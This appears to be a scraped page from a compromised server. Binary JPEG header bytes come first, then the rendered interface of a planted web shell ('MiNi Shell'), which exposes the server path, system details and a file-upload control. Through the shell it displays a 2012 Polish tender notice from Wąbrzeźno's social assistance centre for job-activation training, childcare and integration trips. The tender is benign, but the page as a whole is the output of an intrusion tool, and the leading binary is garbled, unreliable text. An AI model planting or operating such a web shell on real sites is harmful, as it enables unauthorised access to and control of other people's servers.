JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120806/288220-N-2012.html

<p class="kh_header"><b>Wąbrzeźno: Otwarte drzwi. Program aktywizacji i integracji.</b><br>
<b>Numer ogłoszenia: 288220 - 2012; data zamieszczenia: 06.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Wąbrzeźnie , Ul. Wolności 32, 87-200 Wąbrzeźno, woj. kujawsko-pomorskie, tel. 56 689 04 00, faks 56 689 04 10.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Otwarte drzwi. Program aktywizacji i integracji..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkoleń: 
Nazwa szkolenia, ilość osób, ilość godzin teoretycznych i praktycznych:
1.Warsztaty psychologiczne dla osób poszukujących pracy- Ilość osób 20 - 	Ilość godzin teoretycznych 20 i praktycznych 0
2.Doradztwo zawodowe	Ilość osób 22 Ilość godzin - teoretycznych 20- praktycznych 0
3.Bukieciarstwo i florystyka- Ilość osób 6 - Ilość godzin -teoretycznych 40 - praktycznych  80
4.Kasy fiskalne - Ilość osób 4 -Ilość godzin teoretycznych 15- praktycznych 10
5.Sprzedawca z obsługą kasy fiskalnej -Ilość osób 7 - Ilość godzi teoretycznych 30 - praktycznych 20
6.Obsługa wózków widłowych - Ilość osób 3 - Ilość godzin teoretycznych 30 - praktycznych 40
7.Trening kompetencji społecznych - Ilość osób 8 -Ilość godzin teoretycznych 20 - praktycznych 0
8.Warsztaty psychologiczne dla matek samotnie wychowujących dzieci- Ilość osób 8- Ilość godzin teoretycznych 20- praktycznych 0
9.Szkoła rodzica- Ilość osób  -8 Ilość godzin teoretycznych  20- praktycznych 0
10.Warsztaty psychologiczne dla osób uzależnionych- Ilość osób 7- Ilość godzin teoretycznych 20	- praktycznych 0
11.Poradnictwa w zakresie dbania o własny wizerunek- Ilość osób 7- Ilość godzin
teoretycznych 20	- praktycznych 0
12Warsztaty gospodarowania budżetem domowym- Ilość osób 10 -Ilość godzin
teoretycznych 20	- praktycznych 0

Ponadto w ramach realizacji przedmiotu zamówienia wykonawca zobowiązany będzie do realizacji tzw. działań o charakterze środowiskowym, to znaczy:
1. Wyjazd integracyjny Golub- Dobrzyń - Toruń dla 16 osób, atrakcje:
- zwiedzanie zamku w Golubiu- Dobrzyniu
- pobyt w aguaparku  Olender w Wielkiej Nieszawie
- zwiedzanie Torunia z przewodnikiem
- seans filmowy w kinie Cinema

2. Wyjazd integracyjny Brodnica- Lidzbark Welski dla 40 osób, atrakcje:
- zwiedzanie Brodnicy  (zwiedzanie wieży zamkowej oraz miasta z przewodnikiem )
- program integracyjny  w Lidzbarku Welskim (elementy programu integracyjnego:  zorbing, strzelnica,  gry zespołowe )

3. Wyjazd integracyjny do Osady Karbówko dla 14 osób, atrakcje: 
- zwidzenia okolicy  Osady Karbówko na bryczkach konnych
- Chata solna lub mini SPA
-program integracyjny  (elementy programu integracyjnego: konkursy sprawnościowe, strzelnica-wiatrówki i łuki, turniej piłkarzyków stołowych).

Szkolenie ma na celu uzyskanie przez jego uczestników praktycznej umiejętności z zakresu danego szkolenia, a w przypadku warsztatów psychologicznych i doradztwa zawodowego wzrost motywacji, podniesienie samooceny, zwiększenie komunikatywności. Szkolenie musi odbywać się w dni robocze od poniedziałku od piątku w godzinach między 8.00 a 16.00. Za godzinę szkolenia przyjmuje się 45minu zajęć dydaktycznych. 
Wykonawca zobowiązany będzie w ramach realizacji  zamówienia zapewnić opiekę dla dzieci w czasie, gdy opiekunowie lub rodzice dzieci uczestniczyć będą w ww. szkoleniach. Pod pojęciem zorganizowania opieki rozumie się opiekę osoby dorosłej na każde 7 dzieci, która w czasie trwania szkolenia przeprowadzi z dziećmi gry i zabawy ruchowe. W tym celu wykonawca zapewni lokal spełniający warunki sanitarne, bhp i ppoż., oddalony od miejsca szkolenia nie więcej niż 0,5 km. Wykonawca podczas sprawowania opieki nad dziećmi zapewni im drugie śniadanie lub podwieczorek w zależności od pory dnia. 


Nazwa szkolenia, w którym uczestniczy rodzic lub opiekun dziecka, wiek dzieci, ilość dzieci, którym należy zapewnić opiekę: 
		
1.Warsztaty psychologiczne dla osób poszukujących pracy:
Wiek dzieci-rok- 1 dziecko
Wiek dzieci- 2 lata- 3 dzieci
Wiek dzieci-4 lata- 1 dziecko
2.Doradztwo zawodowe:
Wiek dzieci-rok- 1 dziecko
Wiek dzieci- 2 lata- 3 dzieci
Wiek dzieci- 4 lata- 1 dziecko
3.Bukieciarstwo i florystyka:
Wiek dzieci-rok- 1 dziecko
Wiek dzieci-4 lata- 1 dziecko
4.Kasy fiskalne 	0
5.Sprzedawca z obsługą kasy fiskalnej:
Wiek dzieci- 2 lata- 3 dzieci
6.Obsługa wózków widłowych  	0
7.Trening kompetencji społecznych:
Wiek dzieci- rok- 2 dzieci
Wiek dzieci- 2 lata- 2 dzieci
Wiek dzieci- 3 lata- 2 dzieci
Wiek dzieci- 4 lata- 1 dziecko
8.Warsztaty psychologiczne dla matek samotnie wychowujących dzieci:
Wiek dzieci- rok- 2 dzieci
Wiek dzieci- 2 lata- 2 dzieci
Wiek dzieci- 3 lata- 2 dzieci
Wiek dzieci- 4 lata- 1 dziecko
9.Szkoła rodzica:
Wiek dzieci- rok- 2 dzieci
Wiek dzieci- 2 lata- 2 dzieci
Wiek dzieci- 3 lata- 2 dzieci
Wiek dzieci- 4 lata- 1 dziecko
10.Warsztaty psychologiczne dla osób uzależnionych	0
11.Poradnictwa w zakresie dbania o własny wizerunek	0
12Warsztaty gospodarowania budżetem domowym:
Wiek dzieci-rok- 5 dzieci
Wiek dzieci- 2 lata- 5 dzieci
Wiek dzieci- 3 lata- 3 dzieci
Wiek dzieci- 4 lata- 1 dziecko

Wykonawca w ramach realizacji usług szkoleniowych zobowiązany będzie do:
1.Zapewnienia miejsca szkolenia na terenie Wąbrzeźna, wyposażonego w minimum krzesła i stoły lub ławki w ilości odpowiadającej uczestnikom szkolenia, tablice lub flipchart, sprzęt niezbędny do realizacji programu szkolenia. Lokal, w którym odbywać się będą szkolenia musi spełniać warunki sanitarne, tj. WC, umywalka wraz dostępem do ciepłej wody, papieru toaletowego, mydła do rąk, ręczników papierowych lub suszarki do rąk. Sala powinna spełniać wymogi BHP oraz ochrony PPOŻ, musi być minimum ogrzewana, oświetlona i wentylowana. Zamawiający nie dopuszcza, aby miejscem szkoleń były szkoły lub przedszkola na terenie miasta Wąbrzeźna. Pomieszczenie, w którym odbywać się będą szkolenia Wykonawca musi  oznakować zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Kapitał Ludzki. 
2. Obowiązkiem wykonawcy będzie ubezpieczenie NW uczestników szkolenie oraz zapewnienie ubrań roboczych i wymaganego przepisami sprzętu dla osób biorących udział w szkoleniu, które obejmuje zajęcia praktyczne.
3. Wykonawca zorganizuje i sfinansuje badania lekarskie dla uczestników szkoleń praktycznych, stosowanie do charakteru szkolenia. 
4. Wykonawca zapewni catering dla uczestników szkolenia, jeżeli w danym dniu zajęcia będą trwały dłużej niż 6 godzin. Pod pojęciem cateringu zamawiający rozumie obiad dwudaniowy podany w lokalu dostosowanym do żywienia zbiorowego, położonym na terenie miasta Wąbrzeźno.  
5. W każdym dniu szkolenia wykonawca zapewni uczestnikom szkolenia catering w miejscu szkolenia, przez co rozumie się gorące napoje typu kawa, herbata, ciasto -1 kawałek dla uczestnika. Niezależnie od zapisów pkt. 4. 
6. Wykonawca zapewni nieodpłatnie uczestnikom szkolenia materiały szkoleniowe, które będą stanowić własność uczestników szkolenia. Materiały te muszą być nowe, nieużywane, adekwatne do treści szkolenia. Muszą to być minimum notatniki, literatura przedmiotu zgodna z programem szkolenia, długopisy. Dodatkowymi materiałami mogą być skrypty, płyty CD lub materiały ksero - czytelne i dobrej jakości.  Materiały szkoleniowe muszą być oznakowane zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Kapitał Ludzki..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające o których mowa w art. 67 ust.1 pkt 6 PZP. Zakres tych zamówień odpowiadać będzie przedmiotowi zamówienia tzn. będzie polegał na przeprowadzeniu usług szkoleniowych lub działań o charakterze środowiskowym, odpowiadających celom projektu współfinansowanego z EFS, dla którego prowadzone jest niniejsze postępowanie.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy ubiegający się o zamówienie muszą wykazać się wykonaniem w okresie ostatnich 3 lat przed dniem upływu terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum 2 usług w zakresie niezbędnym do wykazania spełniania warunków wiedzy i doświadczenia. Za usługę potwierdzającą wiedzę i doświadczenie będzie uznana usługa szkoleniowa dla minimum 7 osobowej grupy osób  w wymiarze minimum 50 godzin szkoleniowych.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy ubiegający się o zamówienie muszą zapewnić wykonywanie usług szkoleniowych przez osoby posiadające minimum: 
a) w przypadku zajęć teoretycznych minimum wykształcenie średnie związane z zakresem prowadzonych szkoleń, kurs lub przygotowanie pedagogiczne. 
b) w przypadku zajęć praktycznych minimum wykształcenie zawodowe związane z przedmiotem prowadzonych zajęć lub minimum 3 letni staż pracy w zawodzie związanym z przedmiotem prowadzonych szkoleń praktycznych , tj. dla:
- bukieciarstwa i florystyki- kwiaciarka; florystka;
- Obsługa wózków widłowych - operator wózków widłowych; 
-sprzedawca z obsługa kasy fiskalnej/obsługa kas fiskalnych - sprzedawca; 
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Składając ofertę wspólnie (art. 23 ustawy) przez dwóch lub więcej Wykonawców należy zwrócić uwagę w szczególności na następujące wymagania:
a)	następujące dokumenty i oświadczenia: 
-oferta, w części oferty, gdzie należy wpisać nazwę i adres wykonawcy należy wpisać dane konsorcjum z zaznaczeniem słowa  konsorcjum , tak, aby z treści tego zapisu jednoznacznie wynikało, kto składa ofertę. 
podpisują wszyscy członkowie konsorcjum lub Pełnomocnik w imieniu całego konsorcjum.
b)	następujące dokumenty i oświadczenia: 
-oświadczenie o braku podstaw do wykluczenia z postępowania, 
-odpis z właściwego rejestru albo w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt. 2 ustawy 
składa każdy z członków konsorcjum w imieniu własnym.

-oświadczenie o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 Pzp- składa w imieniu Konsorcjum Pełnomocnik</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144Pzp zamawiający przewiduje możliwość takich zmian zgodnie z poniższym:
1.	Dopuszcza się zmianę treści zawartej umowy, jeśli zmianie ulegnie liczba uczestników poszczególnych szkoleń w przypadku, gdy któryś z uczestników zgłosi gotowość zmiany profilu szkolenia lub z przyczyn od siebie niezależnych zmuszony zostanie do rezygnacji ze szkolenia. Wówczas stosowane zmiany wprowadzone zostaną w § 1 ust. 1  umowy. 
2.	Dopuszcza się zmianę treści zawartej umowy, jeśli zmianie ulegnie liczba dzieci wymagająca opieki podczas trwania szkoleń. Wówczas stosowane zmiany wprowadzone zostaną w § 2 ust. 1 pkt 19  umowy. 
3.	Dopuszcza się zmianę treści zawartej umowy w części dotyczącej przewidzianych atrakcji podczas wyjazdów integracyjnych, jeśli z uwagi na brak możliwości rezerwacji miejsca lub warunków atmosferycznych niemożliwe będzie skorzystanie z któregoś z punktów planu wycieczki. Wówczas wykonawca zobowiązany będzie zapewnić równoważną atrakcję. Zmiana ta spowoduje wprowadzenie stosownych zmian do § 1 ust. 2 umowy
4.	Dopuszcza się zmiany w zapisach § 1 ust. 3 i § 2 ust. 2 pkt 19 umowy, jeśli ze względów organizacyjnych korzystniejsza będzie dla uczestników szkolenia zmiana miejsca szkolenia lub miejsca organizacji opieki dla dzieci lub jeśli zaniechanie takiej zmiany spowodowałoby znaczne utrudnienia w wykonaniu zamówienia lub zagrażałoby bezpieczeństwu lub zdrowi uczestników szkolenia lub dzieci pozostawionych pod opieką.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.wabrzezno.com/portal.php?aid=12959920544d3f44f6a8f5e<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można odebrać w siedzibie Zamawiającego MOPS, ul. Wolności 32, 87-200 Wąbrzeźno,  pok. nr 3, w godzinach urzędowania Zamawiającego lub otrzymać drogą elektroniczną..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.08.2012 godzina 15:30, miejsce: Miejski Ośrodek Pomocy Społecznej ul. Wolności 32, 87-200 Wąbrzeźno, pokój nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane jest ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego PO KL Priorytet VII, Działanie 7.1, Poddziałanie 7.1.1..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com